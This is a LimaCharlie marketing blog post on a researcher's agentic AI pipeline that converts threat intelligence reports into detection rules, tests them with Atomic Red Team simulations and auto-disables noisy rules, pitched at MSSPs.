Agentic AI Security: Tune Detections with Threat Intel

Most AI detection engineering puts a human in the loop at every step. David Burkett envisions an efficient and effective pipeline architecture that does not.

David is a security researcher at Corelight Labs and a longtime LimaCharlie community member. He appeared on a recent episode of Defender Fridays to walk through his vision of a fully agentic detection engineering pipeline. His system uses LimaCharlie as its operational backbone.

For MSSPs trying to scale engineering capacity without scaling headcount, David’s approach is worth examining.

What is an agentic detection engineering pipeline?

The core idea: instead of one AI model doing everything, you build a pipeline of specialist sub-agents. Each agent  handles one discrete stage of the detection lifecycle. Validation gates sit between every stage.

The pipeline starts with a threat intelligence report. Agentic AI works through the report and identifies detection opportunities.  A detection engineering agent writes rules and deploys them to LimaCharlie.

From there, LimaCharlie's built-in Atomic Red Team extension triggers activity on an endpoint to test whether the new rules fire. A monitoring agent watches the resulting alert volume. If a rule floods the queue with false positives, the agent can automatically disable the rule before it degrades analyst workflow.

What makes this more reliable than a single-agent approach is the gating. Each stage produces a concrete, verifiable output. The rule either deploys or it doesn't. The endpoint activity either triggers a detection or it doesn't. The false positive rate is measurable. Each step includes checks to reduce hallucination risk.

David also noted the importance of spawning validation sub-agents with isolated context for verification. A fresh AI instance, uncontaminated by the primary agent's reasoning, will catch mistakes the original agent may not. 

Why this matters for security teams and MSSPs

Detection engineering is a high-friction process for security operations. Writing a rule from threat intel, testing it, and tuning false positives is time-intensive. For MSSPs managing coverage across hundreds of client environments, the friction compounds with every tenant and reported threat.

An agentic detection engineering pipeline compresses this cycle significantly. A threat intelligence report that once took hours to convert into tested, deployed detection logic now moves through the pipeline in a fraction of the time.

Every step of the process is logged and verifiable. For MSSPs, this means faster coverage for new threats across the entire client base, not just tenants with dedicated detection engineers.

Consistency is another advantage. An agentic pipeline applies the same logic and the same false positive criteria every time. That consistency is auditable, which matters for clients concerned with meeting specific regulatory requirements.

LimaCharlie enables the architecture

LimaCharlie was built as security infrastructure rather than a point product, which is what makes implementing agentic AI security architecture practical rather than theoretical.

The LimaCharlie API gives agents programmatic control over the full detection and response lifecycle. That includes detections and response (D&R) rule deployment, telemetry ingestion, alert monitoring, and other security operations.

Sub-agents can deploy a rule, observe its output in real time, and modify or retract it through the same API surface. No manual steps, no dashboard handoffs. Because LimaCharlie operates entirely via API, every AI agent action is transparent, governable and auditable.

LimaCharlie’s multi-tenant architecture enables MSSPs to run this pipeline once and propagate coverage across their entire client base. A threat intelligence report can become new client coverage in one pass.

David’s pipeline uses the Atomic Red Team integration to validate detections before production. This simulates the attack technique on a test endpoint and confirms the rule fires before it goes anywhere else. Automated validation separates David’s approach from pipelines that simply deploy rules and hope for the best.

Agentic detection engineering pipelines solve an efficiency problem that has been challenging MSSPs for years. It also represents just one application of agentic AI security, a technology with potential across the full spectrum of security operations.  

To learn more about how LimaCharlie supports agentic SecOps workflows, visit limacharlie.io.